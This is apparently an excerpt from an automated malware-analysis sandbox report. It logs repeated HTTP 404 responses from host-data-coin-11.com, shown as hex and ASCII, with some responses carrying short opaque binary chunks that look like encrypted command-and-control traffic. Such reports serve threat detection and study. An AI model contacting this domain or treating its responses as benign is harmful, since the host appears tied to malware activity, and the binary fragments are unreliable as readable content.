                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:09:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 30 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS0SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 4c 47 bb 29 c4 b0 66 d3 2f 41 0b ac b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OTevLG)f/AW0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 18:10:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 00 53 87 1d f0 f3 66 e6 23 59 1b f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OTevSf#YJ0
